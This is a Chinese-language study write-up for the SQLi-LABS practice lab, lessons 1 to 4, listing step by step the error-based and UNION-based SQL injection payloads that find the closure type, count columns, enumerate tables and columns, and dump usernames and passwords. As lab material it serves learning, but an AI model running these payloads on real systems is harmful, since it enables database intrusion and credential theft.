SQLi-LABS
Less-1-4
Less-1 Error based
查看是否可以注入:
-
输入?id=1 发现可以
-
尝试闭合’发现报错
-
分析报错,确认闭合方式为单引号的字符型注入
进行字段的判断
-
进行order by
-
尝试到4发现出错
-
所以判断字段为3
进行字段查询
-
使用联合查询union select
-
使用前需要将参数?id=1改为?id=-1,否则无法在对应位置显示
-
发现2,3位置存在注入,所以在2,3位置进行替换
-
将2,3位置替换为database(),version(),user()…来获取信息
探测表名
-
获取了数据库名后,进行对表名的探测
-
使用 union select group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+
-
发现users这个表名,.
探测字段名
-
获取表名后,继续向下探测
-
使用union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ --+
-
发现username和password,x.x
探测数据
-
直接点吧
-
union select 1,group_concat(username),group_concat(password) from users --+
less2-4
因为这些很类似,只是闭合方式不同,所以放在一起,后面和上面的类似,就不会每步都截图了-.-
Less-2
- 加单引号 报错,发现是数字型
- ?id=1 oder by 4 --+ 报错
- ?id=-1 union select 1,2,3 --+
- ?id=-1 union select 1,database(),user() --+ 获取到了库名
- ?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+ 获取到表名
- ?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ --+获取字段名
- ?id=-1 union select 1,group_concat(username),group_concat(password) from users --+
Less-3
- 确定注入方式为’),
- ?id=1’) order by 4 --+报错
- ?id=-1’) union select 1,2,3 --+确定位置
- ?id=-1’) union select 1,database(),user() --+ 获取到了库名
- ?id=-1’) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+ 获取到表名
- ?id=-1’) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ --+获取字段名
- ?id=-1’) union select 1,group_concat(username),group_concat(password) from users --+
Less-4
- 确定注入方式为")
- ?id=-1") union select 1,2,3 --+确定位置
- ?id=1") order by 4 --+报错
- ?id=-1") union select 1,database(),user() --+ 获取到了库名
- ?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’ --+ 获取到表名
- ?id=-1’") union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’ --+获取字段名
- ?id=-1") union select 1,group_concat(username),group_concat(password) from users --+